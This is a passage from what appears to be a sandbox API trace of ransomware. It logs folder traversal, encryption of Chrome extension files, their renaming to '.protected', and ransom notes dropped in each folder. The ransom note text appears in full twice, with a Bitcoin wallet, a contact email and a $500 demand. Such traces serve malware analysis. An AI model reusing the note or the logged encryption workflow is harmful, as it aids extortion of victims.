pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json") returned 155 [0080.057] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json") returned 155 [0080.057] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.057] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json") returned 155 [0080.057] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.057] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdc, lpOverlapped=0x0) returned 1 [0080.058] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.058] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdc, lpOverlapped=0x0) returned 1 [0080.058] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.058] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.058] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.058] CloseHandle (hObject=0x168) returned 1 [0080.058] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.protected") returned 165 [0080.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.protected")) returned 1 [0080.059] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.059] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.059] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\RESTORE_FILES.txt") returned 159 [0080.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.059] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.059] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.060] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.060] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.060] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.060] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.060] CloseHandle (hObject=0x164) returned 1 [0080.060] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.060] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0080.060] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0080.060] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0080.060] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0080.060] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0080.060] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil") returned 142 [0080.060] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0080.060] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0080.060] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\*") returned 144 [0080.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.060] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.060] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.060] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.060] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.061] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.061] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\.") returned 144 [0080.061] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.061] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.061] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.061] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.061] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.061] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.061] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.061] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\..") returned 145 [0080.061] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.061] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.061] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.061] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.061] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.061] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.061] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.061] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.061] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json") returned 156 [0080.061] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.061] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.061] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.061] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.062] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json") returned 156 [0080.062] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.062] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json") returned 156 [0080.062] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.062] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json") returned 156 [0080.062] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.062] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0080.063] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.063] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdf, lpOverlapped=0x0) returned 1 [0080.063] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.063] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.063] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.063] CloseHandle (hObject=0x168) returned 1 [0080.063] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.protected") returned 166 [0080.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.protected")) returned 1 [0080.064] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.064] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.064] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\RESTORE_FILES.txt") returned 160 [0080.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.064] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.064] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.065] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.065] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.065] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.065] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.065] CloseHandle (hObject=0x164) returned 1 [0080.065] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.065] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0080.065] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0080.065] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0080.065] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0080.065] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0080.065] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr") returned 141 [0080.065] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0080.065] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0080.065] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\*") returned 143 [0080.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.066] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.066] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.066] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.066] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.066] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.066] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\.") returned 143 [0080.066] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.066] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.066] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.066] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.066] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.066] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.066] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.066] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\..") returned 144 [0080.066] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.066] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.066] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.066] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.066] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.066] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.066] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.066] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.066] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json") returned 155 [0080.066] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.066] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.066] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.066] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.067] 